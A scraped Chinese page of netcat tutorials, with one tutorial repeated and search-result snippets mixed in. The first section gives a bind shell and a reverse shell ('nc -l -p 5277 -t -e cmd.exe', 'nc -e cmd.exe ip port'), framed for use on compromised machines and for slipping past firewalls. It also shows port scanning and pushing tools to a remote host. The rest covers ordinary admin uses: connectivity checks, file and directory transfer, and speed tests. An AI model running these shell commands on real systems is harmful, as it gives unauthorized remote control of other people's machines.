    将详细信息写入E盘log.dat的日志文件

    nc -l -v -p 80

    和上边命令相似,会直接显示信息在运行着NC的屏幕上。

    实践:

    例如:nc -l -v -p 80

    然后在浏览器中输入本机IP:127.0.0.1

     

    命令2:程序定向(反弹shell的方法)

    nc -l -p port -t -e cmd.exe

    本地机: nc -l -p port 或 nc -l -v -p port

    目标机:nc -e cmd.exe ip port

    参数解释:

    -l、-p两个参数已经解释过了

    -e;作用就是程序定向
    -t:以telnet的形式来应答

    例子

    nc -l -p 5277 -t -e cmd.exe

    千万不要运行在自己的机器上,如果运行了,你机器就会变成一台TELNET的服务器了。

    命令解释为:监听本地端口5277的入站信息,同时将CMD.exe这个程序,重定向到端口5277上,当有人连接的时候,就让程序CMD.exe以TELNET的形式来响应连接要求。

    说白了,其实就是让他成为一台TELNET的肉鸡,所以这个命令要运行在你的肉鸡上。

     

    例如用法:

    local machine:nc -l -p port ( or nc -l -v -p port )
    remote machine:nc -e cmd.exe ip port

     

    大家知道灰鸽子和神偷吧,这两款工具都是利用了反弹端口型的木马,
    什么叫反弹端口?

    就是说,当对方中马后,不用你主动和对方连接,也就是说不用从你的client端向对方主机上运行的server端发送请求连接,而是对方主动来连接你这样就可以使很多防火墙失效,因为很多防火墙都不检查出站请求的。这里这两个命令结合在一起后,于那两款木马可以说有异曲同工之效。

     

    本地运行:nc -l -p 5277 (监听本地5277端口)或者 nc -l -v -p 5277

    然后在远程机器上,想办法运行 nc -e cmd.exe ip 5277

    (你可别真的打“ip”在肉鸡上啊)要打,xxx.xxx.xxx.xxx这样!!

     

    这样就是反弹~~在本地机器上得到了一个SHELL

    命令3:扫描端口

    nc -v ip port
    nc -v -z ip port-port
    nc -v -z -u ip port-port


    参数解释:

    -z:将输入输出关掉,在扫描时使用

    nc -v ip port

    这个命令是针对某一个端口进行扫描

    例如:

    nc -v ip 135

    扫描远程主机的135端口,这样获得了该端口的一些简单信息,但是针对某些端口,我们还可以获得更多的信息

    例如:80端口

    我们可以使用nc -v ip 80 然后使用get方法来获得对方的WEB服务器的信息


    nc -v -z ip port-port

    这个命令是用来扫描的一个命令,这个命令用于快速扫描TCP端口,而port-port则是指定了扫描的端口范围

    例如:

    nc -v -z ip 1-200

    可以看到我机器上的1-200的TCP端口的开放情况


    nc -v -z -u ip port-port

    这个命令比上个命令多了个-u,这个命令的作用仍然是扫描端口,只是多了一个-u的参数,是用来扫UDP端口的

    例如:

    nc -v -z -u ip 1-200

    这个命令就会扫1-200的UDP端口

    命令4:传送文件(HOHO,I LIKE)

    LOCAL MACHINE:nc -v -n ip port < x:\svr.exe
    REMOTE MACHINE:nc -v -l -p port > y:\svr.exe

    参数解释:

    -n:指定数字的IP地址

    这两个命令结合起来是用来传送文件的

    首先,在远程机上运行命令:

    nc -v -l -p 5277 > c:\pulist.exe

    这个命令还记的吗?呵呵,是不是和监听命令有点类似,对,没错,这个是监听5277端口

    并把接受到的信息数据写到c:\pulist.exe中


    这时候在本地机上运行

    nc -v -n ip 5277 < e:\hack\pulist.exe

    这个命令的意思就是,从本地E盘跟目录中读取pulist.exe文件的内容,并把这些数据发送到ip的5277端口上

    这样远程主机就会自动创建一个pulist.exe文件。

    展开全文
  • nc用法

    千次阅读 2019-03-14 00:05:12
    什么是nc nc是netcat的简写,有着网络界的瑞士军刀美誉。因为它短小精悍、功能实用,被设计为一个简单、可靠的网络工具 nc的作用 (1)实现任意TCP/UDP端口的侦听,nc可以作为server以TCP或UDP方式侦听指定端口 ...

    https://www.cnblogs.com/nmap/p/6148306.html

    什么是nc

    nc是netcat的简写,有着网络界的瑞士军刀美誉。因为它短小精悍、功能实用,被设计为一个简单、可靠的网络工具

    nc的作用

    (1)实现任意TCP/UDP端口的侦听,nc可以作为server以TCP或UDP方式侦听指定端口

    (2)端口的扫描,nc可以作为client发起TCP或UDP连接

    (3)机器之间传输文件

    (4)机器之间网络测速                                                                                                                                                                                                                        

    nc的控制参数不少,常用的几个参数如下所列:

    1) -l

    用于指定nc将处于侦听模式。指定该参数,则意味着nc被当作server,侦听并接受连接,而非向其它地址发起连接。

    2) -p <port>

    暂未用到(老版本的nc可能需要在端口号前加-p参数,下面测试环境是centos6.6,nc版本是nc-1.84,未用到-p参数)

    3) -s 

    指定发送数据的源IP地址,适用于多网卡机 

    4) -u

     指定nc使用UDP协议,默认为TCP

    5) -v

    输出交互或出错信息,新手调试时尤为有用

    6)-w

    超时秒数,后面跟数字 

    7)-z

    表示zero,表示扫描时不发送任何数据

     

     

     

    前期准备

    准备两台机器,用于测试nc命令的用法

    主机A:ip地址 10.0.1.161

    主机B:ip地址 10.0.1.162

     

    两台机器先安装nc和nmap的包

    yum install nc -y

    yum install nmap -y

    如果提示如下-bash: nc: command not found 表示没安装nc的包

     

    nc用法1,网络连通性测试和端口扫描

     

     

    nc可以作为server端启动一个tcp的监听(注意,此处重点是起tcp,下面还会讲udp)

    先关闭A的防火墙,或者放行下面端口,然后测试B机器是否可以访问A机器启动的端口

    在A机器上启动一个端口监听,比如 9999端口(注意:下面的-l 是小写的L,不是数字1)

    默认情况下下面监听的是一个tcp的端口

    nc -l 9999

     

    客户端测试,测试方法1

    在B机器上telnet A机器此端口,如下显示表示B机器可以访问A机器此端口

     

     

    客户端测试,测试方法2

    B机器上也可以使用nmap扫描A机器的此端口

    nmap 10.0.1.161 -p9999

     

     

    客户端测试,测试方法3

    使用nc命令作为客户端工具进行端口探测

    nc -vz -w 2 10.0.1.161 9999

    (-v可视化,-z扫描时不发送数据,-w超时几秒,后面跟数字)

    上面命令也可以写成

    nc -vzw 2 10.0.1.161 9999

     

     

    客户端测试,测试方法4(和方法3相似,但用处更大)

    nc可以可以扫描连续端口,这个作用非常重要。常常可以用来扫描服务器端口,然后给服务器安全加固

    在A机器上监听2个端口,一个9999,一个9998,使用&符号丢入后台

     

    在客户端B机器上扫描连续的两个端口,如下

     

     

     

    nc作为server端启动一个udp的监听(注意,此处重点是起udp,上面主要讲了tcp)

    启动一个udp的端口监听

    nc  -ul  9998

    复制当前窗口输入 netstat -antup |grep 9998 可以看到是启动了udp的监听

     

     

    客户端测试,测试方法1

    nc -vuz 10.0.1.161 9998

    由于udp的端口无法在客户端使用telnet去测试,我们可以使用nc命令去扫描(前面提到nc还可以用来扫描端口)

    (telnet是运行于tcp协议的)

    (u表示udp端口,v表示可视化输出,z表示扫描时不发送数据)

    上面在B机器扫描此端口的时候,看到A机器下面出现一串XXXXX字符串

     

     

     

    客户端测试,测试方法2

    nmap -sU 10.0.1.161 -p 9998 -Pn

    (它暂无法测试nc启动的udp端口,每次探测nc作为server端启动的udp端口时,会导致对方退出侦听,有这个bug,对于一些程序启动的udp端口在使用nc扫描时不会有此bug)

    下面,A机器启动一个udp的端口监听,端口为9998

    在复制的窗口上可以确认已经在监听了

    B机器使用nmap命令去扫描此udp端口,在扫描过程中,导致A机器的nc退出监听。所以显示端口关闭了(我推测是扫描时发数据导致的)

    nmap -sU 10.0.1.161 -p 9998 -Pn

    -sU :表示udp端口的扫描

    -Pn :如果服务器禁PING或者放在防火墙下面的,不加-Pn 参数的它就会认为这个扫描的主机不存活就不会进行扫描了,如果不加-Pn就会像下面的结果一样,它也会进行提示你添加上-Pn参数尝试的

    注意:如果A机器开启了防火墙,扫描结果可能会是下面状态。(不能确定对方是否有监听9998端口)

    既然上面测试无法使用nmap扫描nc作为服务端启动的端口,我们可以使用nmap扫描其余的端口

    (额,有点跑题了,讲nmap的用法了,没关系,主要为了说明nmap是也可以用来扫描udp端口的,只是扫描nc启动的端口会导致对方退出端口监听)

    下面,A机器上rpcbind服务,监听在udp的111端口

    在B机器上使用nmap扫描此端口,是正常的检测到处于open状态

     

    客户端测试,测试方法3

    nc扫描大量udp端口

    扫描过程比较慢,可能是1秒扫描一个端口,下面表示扫描A机器的1到1000端口(暂未发现可以在一行命令中扫描分散的几个端口的方法)

    nc -vuz 10.0.1.161 1-1000

     

     

     

     

     

     

     

     

     

     

     

     

     

     

    nc用法2,使用nc传输文件和目录

     

    方法1,传输文件演示(先启动接收命令)

    使用nc传输文件还是比较方便的,因为不用scp和rsync那种输入密码的操作了

    把A机器上的一个rpm文件发送到B机器上

    需注意操作次序,receiver先侦听端口,sender向receiver所在机器的该端口发送数据。  

     

    步骤1,先在B机器上启动一个接收文件的监听,格式如下

    意思是把赖在9995端口接收到的数据都写到file文件里(这里文件名随意取)

    nc -l port >file

    nc -l 9995 >zabbix.rpm

     

    步骤2,在A机器上往B机器的9995端口发送数据,把下面rpm包发送过去

    nc 10.0.1.162 9995 < zabbix-release-2.4-1.el6.noarch.rpm

    B机器接收完毕,它会自动退出监听,文件大小和A机器一样,md5值也一样

     

     

    方法2,传输文件演示(先启动发送命令)

    步骤1,先在B机器上,启动发送文件命令

    下面命令表示通过本地的9992端口发送test.mv文件

    nc -l 9992 <test.mv

     

    步骤2,A机器上连接B机器,取接收文件

    下面命令表示通过连接B机器的9992端口接收文件,并把文件存到本目录下,文件名为test2.mv

    nc 10.0.1.162 9992 >test2.mv

     

     

     

    方法3,传输目录演示(方法发送文件类似)

     

    步骤1,B机器先启动监听,如下

    A机器给B机器发送多个文件

    传输目录需要结合其它的命令,比如tar

    经过我的测试管道后面最后必须是 - ,不能是其余自定义的文件名

    nc -l 9995 | tar xfvz -

     

    步骤2,A机器打包文件并连接B机器的端口

    管道前面表示把当前目录的所有文件打包为 - ,然后使用nc发送给B机器

    tar cfz - * | nc 10.0.1.162 9995

    B机器这边已经自动接收和解压

     

     

     

     

     

     

     

     

     

     

     

     

     

    nc用法3,测试网速

    测试网速其实利用了传输文件的原理,就是把来自一台机器的/dev/zero 发送给另一台机器的/dev/null

    就是把一台机器的无限个0,传输给另一个机器的空设备上,然后新开一个窗口使用dstat命令监测网速

    在这之前需要保证机器先安装dstat工具

    yum install -y dstat

     

    方法1,测试网速演示(先启动接收命令方式)

    步骤1,A机器先启动接收数据的命令,监听自己的9991端口,把来自这个端口的数据都输出给空设备(这样不写磁盘,测试网速更准确)

    nc -l 9991 >/dev/null

     

    步骤2,B机器发送数据,把无限个0发送给A机器的9991端口

    nc 10.0.1.161 9991 </dev/zero

     

    在复制的窗口上使用dstat命令查看当前网速,dstat命令比较直观,它可以查看当前cpu,磁盘,网络,内存页和系统的一些当前状态指标。

    我们只需要看下面我选中的这2列即可,recv是receive的缩写,表示接收的意思,send是发送数据,另外注意数字后面的单位B,KB,MB

     

    可以看到A机器接收数据,平均每秒400MB左右

    B机器新打开的窗口上执行dstat,看到每秒发送400MB左右的数据

     

     

     

    方法2,测试网速演示(先启动发送命令方式)

    步骤1,先启动发送的数据,谁连接这个端口时就会接收来自zero设备的数据(二进制的无限个0)

    nc -l 9990 </dev/zero

    步骤2,下面B机器连接A机器的9990端口,把接收的数据输出到空设备上

    nc 10.0.1.161 9990 >/dev/null

    同样可以使用dstat观察数据发送时的网速

     

    展开全文
  • nc命令用法举例

    万次阅读 2018-08-24 15:43:13
    什么是nc nc是netcat的简写,有着网络界的瑞士军刀美誉。因为它短小精悍、功能实用,被设计为一个简单、可靠的网络工具 nc的作用 (1)实现任意TCP/UDP端口的侦听,nc可以作为server以TCP或UDP方式侦听指定端口 ...

    什么是nc

    nc是netcat的简写,有着网络界的瑞士军刀美誉。因为它短小精悍、功能实用,被设计为一个简单、可靠的网络工具

    nc的作用

    (1)实现任意TCP/UDP端口的侦听,nc可以作为server以TCP或UDP方式侦听指定端口

    (2)端口的扫描,nc可以作为client发起TCP或UDP连接

    (3)机器之间传输文件

    (4)机器之间网络测速                                                                                                                                                                                                                        

    nc的控制参数不少,常用的几个参数如下所列:

    1) -l

    用于指定nc将处于侦听模式。指定该参数,则意味着nc被当作server,侦听并接受连接,而非向其它地址发起连接。

    2) -p <port>

    暂未用到(老版本的nc可能需要在端口号前加-p参数,下面测试环境是centos6.6,nc版本是nc-1.84,未用到-p参数)

    3) -s 

    指定发送数据的源IP地址,适用于多网卡机 

    4) -u

     指定nc使用UDP协议,默认为TCP

    5) -v

    输出交互或出错信息,新手调试时尤为有用

    6)-w

    超时秒数,后面跟数字 

    7)-z

    表示zero,表示扫描时不发送任何数据

     

     

     

    前期准备

    准备两台机器,用于测试nc命令的用法

    主机A:ip地址 10.0.1.161

    主机B:ip地址 10.0.1.162

     

    两台机器先安装nc和nmap的包

    yum install nc -y

    yum install nmap -y

    如果提示如下-bash: nc: command not found 表示没安装nc的包

     

    nc用法1,网络连通性测试和端口扫描

     

     

    nc可以作为server端启动一个tcp的监听(注意,此处重点是起tcp,下面还会讲udp)

    先关闭A的防火墙,或者放行下面端口,然后测试B机器是否可以访问A机器启动的端口

    在A机器上启动一个端口监听,比如 9999端口(注意:下面的-l 是小写的L,不是数字1)

    默认情况下下面监听的是一个tcp的端口

    nc -l 9999

     

    客户端测试,测试方法1

    在B机器上telnet A机器此端口,如下显示表示B机器可以访问A机器此端口

     

     

    客户端测试,测试方法2

    B机器上也可以使用nmap扫描A机器的此端口

    nmap 10.0.1.161 -p9999

     

     

    客户端测试,测试方法3

    使用nc命令作为客户端工具进行端口探测

    nc -vz -w 2 10.0.1.161 9999

    (-v可视化,-z扫描时不发送数据,-w超时几秒,后面跟数字)

    上面命令也可以写成

    nc -vzw 2 10.0.1.161 9999

     

     

    客户端测试,测试方法4(和方法3相似,但用处更大)

    nc可以可以扫描连续端口,这个作用非常重要。常常可以用来扫描服务器端口,然后给服务器安全加固

    在A机器上监听2个端口,一个9999,一个9998,使用&符号丢入后台

     

    在客户端B机器上扫描连续的两个端口,如下

     

     

     

    nc作为server端启动一个udp的监听(注意,此处重点是起udp,上面主要讲了tcp)

    启动一个udp的端口监听

    nc  -ul  9998

    复制当前窗口输入 netstat -antup |grep 9998 可以看到是启动了udp的监听

     

     

    客户端测试,测试方法1

    nc -vuz 10.0.1.161 9998

    由于udp的端口无法在客户端使用telnet去测试,我们可以使用nc命令去扫描(前面提到nc还可以用来扫描端口)

    (telnet是运行于tcp协议的)

    (u表示udp端口,v表示可视化输出,z表示扫描时不发送数据)

    上面在B机器扫描此端口的时候,看到A机器下面出现一串XXXXX字符串

     

     

     

    客户端测试,测试方法2

    nmap -sU 10.0.1.161 -p 9998 -Pn

    (它暂无法测试nc启动的udp端口,每次探测nc作为server端启动的udp端口时,会导致对方退出侦听,有这个bug,对于一些程序启动的udp端口在使用nc扫描时不会有此bug)

    下面,A机器启动一个udp的端口监听,端口为9998

    在复制的窗口上可以确认已经在监听了

    B机器使用nmap命令去扫描此udp端口,在扫描过程中,导致A机器的nc退出监听。所以显示端口关闭了(我推测是扫描时发数据导致的)

    nmap -sU 10.0.1.161 -p 9998 -Pn

    -sU :表示udp端口的扫描

    -Pn :如果服务器禁PING或者放在防火墙下面的,不加-Pn 参数的它就会认为这个扫描的主机不存活就不会进行扫描了,如果不加-Pn就会像下面的结果一样,它也会进行提示你添加上-Pn参数尝试的

    注意:如果A机器开启了防火墙,扫描结果可能会是下面状态。(不能确定对方是否有监听9998端口)

    既然上面测试无法使用nmap扫描nc作为服务端启动的端口,我们可以使用nmap扫描其余的端口

    (额,有点跑题了,讲nmap的用法了,没关系,主要为了说明nmap是也可以用来扫描udp端口的,只是扫描nc启动的端口会导致对方退出端口监听)

    下面,A机器上rpcbind服务,监听在udp的111端口

    在B机器上使用nmap扫描此端口,是正常的检测到处于open状态

     

    客户端测试,测试方法3

    nc扫描大量udp端口

    扫描过程比较慢,可能是1秒扫描一个端口,下面表示扫描A机器的1到1000端口(暂未发现可以在一行命令中扫描分散的几个端口的方法)

    nc -vuz 10.0.1.161 1-1000

     

     

     

     

     

     

     

     

     

     

     

     

     

     

    nc用法2,使用nc传输文件和目录

     

    方法1,传输文件演示(先启动接收命令)

    使用nc传输文件还是比较方便的,因为不用scp和rsync那种输入密码的操作了

    把A机器上的一个rpm文件发送到B机器上

    需注意操作次序,receiver先侦听端口,sender向receiver所在机器的该端口发送数据。  

     

    步骤1,先在B机器上启动一个接收文件的监听,格式如下

    意思是把赖在9995端口接收到的数据都写到file文件里(这里文件名随意取)

    nc -l port >file

    nc -l 9995 >zabbix.rpm

     

    步骤2,在A机器上往B机器的9995端口发送数据,把下面rpm包发送过去

    nc 10.0.1.162 9995 < zabbix-release-2.4-1.el6.noarch.rpm

    B机器接收完毕,它会自动退出监听,文件大小和A机器一样,md5值也一样

     

     

    方法2,传输文件演示(先启动发送命令)

    步骤1,先在B机器上,启动发送文件命令

    下面命令表示通过本地的9992端口发送test.mv文件

    nc -l 9992 <test.mv

     

    步骤2,A机器上连接B机器,取接收文件

    下面命令表示通过连接B机器的9992端口接收文件,并把文件存到本目录下,文件名为test2.mv

    nc 10.0.1.162 9992 >test2.mv

     

     

     

    方法3,传输目录演示(方法发送文件类似)

     

    步骤1,B机器先启动监听,如下

    A机器给B机器发送多个文件

    传输目录需要结合其它的命令,比如tar

    经过我的测试管道后面最后必须是 - ,不能是其余自定义的文件名

    nc -l 9995 | tar xfvz -

     

    步骤2,A机器打包文件并连接B机器的端口

    管道前面表示把当前目录的所有文件打包为 - ,然后使用nc发送给B机器

    tar cfz - * | nc 10.0.1.162 9995

    B机器这边已经自动接收和解压

     

     

     

     

     

     

     

     

     

     

     

     

     

    nc用法3,测试网速

    测试网速其实利用了传输文件的原理,就是把来自一台机器的/dev/zero 发送给另一台机器的/dev/null

    就是把一台机器的无限个0,传输给另一个机器的空设备上,然后新开一个窗口使用dstat命令监测网速

    在这之前需要保证机器先安装dstat工具

    yum install -y dstat

     

    方法1,测试网速演示(先启动接收命令方式)

    步骤1,A机器先启动接收数据的命令,监听自己的9991端口,把来自这个端口的数据都输出给空设备(这样不写磁盘,测试网速更准确)

    nc -l 9991 >/dev/null

     

    步骤2,B机器发送数据,把无限个0发送给A机器的9991端口

    nc 10.0.1.161 9991 </dev/zero

     

    在复制的窗口上使用dstat命令查看当前网速,dstat命令比较直观,它可以查看当前cpu,磁盘,网络,内存页和系统的一些当前状态指标。

    我们只需要看下面我选中的这2列即可,recv是receive的缩写,表示接收的意思,send是发送数据,另外注意数字后面的单位B,KB,MB

     

    可以看到A机器接收数据,平均每秒400MB左右

    B机器新打开的窗口上执行dstat,看到每秒发送400MB左右的数据

     

     

     

    方法2,测试网速演示(先启动发送命令方式)

    步骤1,先启动发送的数据,谁连接这个端口时就会接收来自zero设备的数据(二进制的无限个0)

    nc -l 9990 </dev/zero

    步骤2,下面B机器连接A机器的9990端口,把接收的数据输出到空设备上

    nc 10.0.1.161 9990 >/dev/null

    同样可以使用dstat观察数据发送时的网速

    展开全文
  • 我和你一样曾经对NC一无所知,因为选择了这个工作,所以我决心要做好它。学习一个新的东西总要走不少弯路,学习有时候会很枯燥,让你对它的热情降低,你要不时的看看别的东西来调节下自己的口味。要学的东西很多,...
  • nc命令介绍

    千次阅读 2017-09-17 21:19:02
    nc - 连接、监听任意的TCP和UDP。  概要:  nc [-46DdhklnrStUuvzC] [-i 间隔] [-p 源端口]  [-s 源IP地址] [-T 服务类型] [-w 超时时间] [-X 代理协议]  [-x 代理地址[:端口]] [主机名] [端口[s]] 详细...
  • nc命令小简介

    2018-12-18 23:02:51
    Running at : nc pwnable.kr 9009 我之前一直把它跟那个计算次数的命令wc给弄混了,实在是有些尴尬,于是就想来记录一下 最好的工具莫过于 man nc了 The nc (or netcat) utility is used for just about anything un...
  • 使用NC命令反弹Shell

    万次阅读 2019-03-14 16:10:34
    nc全称为netcat,所做的就是在两台电脑之间建立链接,并返回两个数据流 可运行在TCP或者UDP模式,添加参数 —u 则调整为udP,默认为tcp -v 参数,详细输出 -n参数,netcat不要DNS反向查询IP的域名 -z参数,连接成功...
  • windows环境下nc(netcat)的安装及使用

    万次阅读 2019-03-29 17:58:40
    我下载下来360会拦截,说是有木马,我没有理会,下载考出nc.exe后将文件就删了 打开下载的压缩包,找到nc.exe,复制粘贴到 c盘 users/当前登录用户目录下即可(简单粗暴的方式,也可以自己配置环境变量) 二、...
  • nc在centos7上的安装和简单使用

    万次阅读 2015-12-14 10:48:49
    cat 123 |nc 192.168.1.10 8888 将标准输入转发到192.168.1.10的8888端口,,并将返回输出到标准输出 可以直接发送HTTP请求 $nc 192.168.1.10 80 GET / HTTP/1.0 EOF 即可显示首页内容 收
  • Linux中nc命令的安装使用

    万次阅读 2017-06-06 18:27:49
    在Linux中有一个级强大的网络工具netcat,在...yum install -y nc 测试使用  在一个终端上 输入 nc -lk 9999  输入数据。。。 新开启一个终端 输入 nc ip:9999  就可以看到上一个终端输入的数据
  • 打开和输出nc 文件。简单的方法

    万次阅读 2017-05-23 10:44:11
  • Linux和Windows下使用NC(Netcat)命令测试端口连通性
  • matlab读取.nc格式文件

    万次阅读 2019-05-28 16:26:55
    matlab读取.nc格式文件函数ncinfoncread代码第一步读取文件第二步循环提取nc变量 函数 ncinfo info = ncinfo('D:\DATA\data.nc') %读取nc文件信息 ncread nc_var = ncinfo('D:\DATA\data.nc','SIF') %读取nc文件...
  • linux nc命令相互发消息及传文件

    万次阅读 2016-11-04 18:18:23
    服务器在某个端口上侦听,使用nc -l 主机ip地址 端口号,当然也可以加上-v来显示这个过程,如果不指定ip地址的话就默认是0.0.0.0,相当于INADDR_ANY。  2. 客户端通过 nc 主机ip地址 端口号 连接服务器,连接成功...
  • .nc格式数据的读取

    万次阅读 2018-10-17 16:00:43
    netcdf数据:.nc格式数据的读取(使用excel4netcdf打开NC数据) 读取.nc文件的方式好像比较多,本人也是刚开始接触.nc文件,着实焦头烂额了一把。无意间看到了使用Excell插件打开.nc文件,感觉挺好用,记录在此,...
  • MATLAB读取nc数据并显示

    万次阅读 2020-06-11 19:23:03
    本篇博客主要介绍采用MATLAB读取nc数据并进行显示。 首先是显示经纬度: 示例代码: lon = ncread('met_em.d02.2018-09-12_00_00_00.nc', 'XLONG_C'); lat = ncread('met_em.d02.2018-09-12_00_00_00.nc', 'XLAT...
  • nc用法2,使用nc传输文件和目录

    万次阅读 2017-07-11 14:11:33
    方法1,传输文件演示(先启动接收命令) 使用nc传输文件还是比较方便的,因为不用scp和rsync那种输入密码的操作了 把A机器上的一个rpm文件发送到B机器上 需注意操作次序,receiver先侦听端口,sender向receiver...
  • 在linux中,命令 nc -lk 和nc -lp 的区别是什么 nc -l 开启 监听模式,用于指定nc将处于监听模式。通常 这样代表着为一个 服务等待客户端来链接指定的端口。 -p&lt;通信端口&gt; 设置本地主机使用的通信...
  • PONC 概念,定义与要素

    万次阅读 2012-03-28 15:31:43
    PONC的框架 PONC作为一种管理的工具,应该怎么使用,它与质量成本之间到底是一种什么关系? 质量成本分为以下四部分: 预防成本; 鉴别成本; 内部损失; 外部损失。 其中,失败的成本叫做PONC,鉴定成本和...
1 2 3 4 5 ... 20
收藏数 118,640
精华内容 47,456
关键字:

nc